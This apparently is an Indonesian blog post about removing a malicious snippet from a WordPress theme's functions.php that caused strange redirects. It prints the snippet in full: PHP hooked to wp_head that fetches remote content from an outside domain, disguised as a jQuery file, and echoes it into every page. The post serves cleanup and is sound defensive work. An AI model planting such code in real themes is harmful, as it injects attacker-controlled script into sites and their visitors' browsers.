Ada yang aneh ketika saya mencoba web saya sendiri, yaitu selalu terdapat perubahan url yang selalu redirect berupa framerequest. Aneh, padahal saya tidak melakukan perubahan apa-apa. Bahkan saya cek log security pun tidak ada.

Setelah searching-searching, ketemulah masalahnya. Itu karena ada semacam malicious script pada script template/theme yang digunakan. Walau sebelumnya lancar-lancar saja.

Solusinya, coba cek file functions.php.

Lalu  carilah script seperti ini :

if (!function_exists('insert_jquery_theme')) {
    function insert_jquery_theme() {
        if (function_exists('curl_init')) {
            $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_theme');
}

jika tidak ada, coba cek apakah file functions.php tersebut meng-include / require file lain lagi. Jika iya, cek file-file tersebut.

Lalu script tadi dihapus atau dijadikkan komentar. Lalu simpan.

Dan berhasil 🙂

Tulisan Lain   Logsys : Implementasi Login PHP yang Aman dan Powerfull

By alfach

Leave a Reply

Your email address will not be published. Required fields are marked *